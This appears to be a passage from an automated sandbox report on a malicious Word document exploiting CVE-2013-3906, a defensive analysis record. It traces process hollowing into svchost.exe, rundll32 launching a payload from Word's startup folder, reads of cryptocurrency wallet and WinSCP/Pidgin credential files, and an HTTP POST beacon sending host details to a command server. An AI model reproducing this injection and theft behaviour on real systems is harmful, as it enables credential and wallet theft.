 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0
buffer Buffer with sha1: d84645b497a6c14e439dcc66d8afbd5112ee3728
host 172.217.25.14
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 8740
region_size: 294912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000031c
1 0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
file C:\Users\test22\AppData\Roaming\Bitcoin\wallets
file C:\Users\test22\AppData\Roaming\Electrum\wallets
registry HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 8740
process_handle: 0x0000031c
1 1 0
Time & API Arguments Status Return Repeated

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
Process injection Process 6928 called NtSetContextThread to modify thread in remote process 8740
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4199552
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000318
process_identifier: 8740
1 0 0
com_class Scripting.FileSystemObject May attempt to write one or more files to the harddisk
cve CVE-2013-3906
parent_process winword.exe martian_process rundll32.exe c:\users\test22\appdata\roaming\microsoft\word\startup\zs.z,XBDOAOUFMRH
file C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
Time & API Arguments Status Return Repeated

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=1705_wxa09&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
0 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=1705_wxa09&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
1 1 0
Process injection Process 6928 resumed a thread in remote process 8740
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000318
suspend_count: 1
process_identifier: 8740
1 0 0
file C:\Users\test22\AppData\Local\Temp\fax.f
dead_host 45.90.46.59:80
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000040c
suspend_count: 1
process_identifier: 8024
1 0 0

NtResumeThread

 thread_handle: 0x0000042c
suspend_count: 1
process_identifier: 8024
1 0 0

NtResumeThread

 thread_handle: 0x0000048c
suspend_count: 1
process_identifier: 8024
1 0 0

NtResumeThread

 thread_handle: 0x000004a4
suspend_count: 1
process_identifier: 8024
1 0 0

NtResumeThread

 thread_handle: 0x00000514
suspend_count: 1
process_identifier: 8024
1 0 0

CreateProcessInternalW

 thread_identifier: 7636
thread_handle: 0x000005b8
process_identifier: 6928
current_directory:
filepath:
track: 1
command_line: rundll32.exe c:\users\test22\appdata\roaming\microsoft\word\startup\zs.z,XBDOAOUFMRH
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x000005b4
1 1 0

NtResumeThread

 thread_handle: 0x00000654
suspend_count: 1
process_identifier: 8024
1 0 0

NtResumeThread

 thread_handle: 0x00000664
suspend_count: 1
process_identifier: 8024
1 0 0

CreateProcessInternalW

 thread_identifier: 7772
thread_handle: 0x00000318
process_identifier: 8740
current_directory:
filepath:
track: 1
command_line: C:\Windows\System32\svchost.exe
filepath_r:
stack_pivoted: 0
creation_flags: 1060 (CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000031c
1 1 0

NtAllocateVirtualMemory

 process_identifier: 8740
region_size: 294912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000031c
1 0 0

WriteProcessMemory

 buffer:
base_address: 0x00400000
process_identifier: 8740
process_handle: 0x0000031c
1 1 0

NtGetContextThread

 thread_handle: 0x00000318
1 0 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 8740
process_handle: 0x0000031c
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4199552
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000318
process_identifier: 8740
1 0 0

NtResumeThread

 thread_handle: 0x00000318
suspend_count: 1
process_identifier: 8740
1 0 0